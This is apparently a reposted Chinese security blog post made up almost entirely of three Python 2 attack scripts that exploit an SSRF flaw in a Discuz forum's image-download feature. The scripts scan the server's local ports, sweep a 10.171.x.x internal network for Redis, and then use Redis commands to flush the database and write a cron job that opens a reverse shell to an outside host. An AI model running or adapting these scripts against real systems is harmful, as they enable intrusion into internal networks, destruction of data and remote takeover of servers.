掃描本機開放的端口:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time
threads_count = 2
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
que.put(str(i))
def run():
while que.qsize() > 0:
p = que.get()
print p + " \r",
try:
url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
port=p)
r = requests.get(url,timeout=2.8)
except:
lock.acquire()
print "{port} Open".format(port=p)
lock.release()
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()
while que.qsize() > 0:
time.sleep(1.0)
掃描内網開放6379端口的主機:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
threads_count = 20
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.171."
for i in range(1,255):
for j in range(1,255):
que.put(ip + str(i) + '.'+str(j))
# for i in range(0,255):
# que.put(ip + str(i))
def run():
while que.qsize() > 0:
ip = que.get()
try:
url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
ip=ip,
port="65321")
r = requests.get(url,timeout=5)
try:
url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
ip=ip,
port="6379")
r = requests.get(url,timeout=5)
lock.acquire()
print ip
lock.release()
except :
lock.acquire()
print "{ip} 6379 Open".format(ip=ip)
lock.release()
except:
pass
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()
while que.qsize() > 0:
time.sleep(1.0)
通過ssrf操作内網redis寫任務計劃反彈shell:
#!/usr/bin/env python
# coding=utf-8
# email: [email protected]
import requests
host = '10.171.26.22'
port = '6379'
bhost = 'phpinfo.me'
bport = '32'
vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'
_location = 'http://tools.phpinfo.me/ssrf.php'
shell_location = 'http://tools.phpinfo.me/shell.php'
#1 flush db
_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#2 set crontab command
_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(
host = host,
port = port,
bhost = bhost,
bport = bport)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#3 config set dir /var/spool/cron/
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#4 config set dbfilename root
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
#5 save to file
_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(
host = host,
port = port)
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
print exp_uri
print len(requests.get(exp_uri).content)
文章轉載Lcy
本文來自: 蝸蝸俠's Blog-關注網絡安全 http://blog.icxun.cn/Python/626.html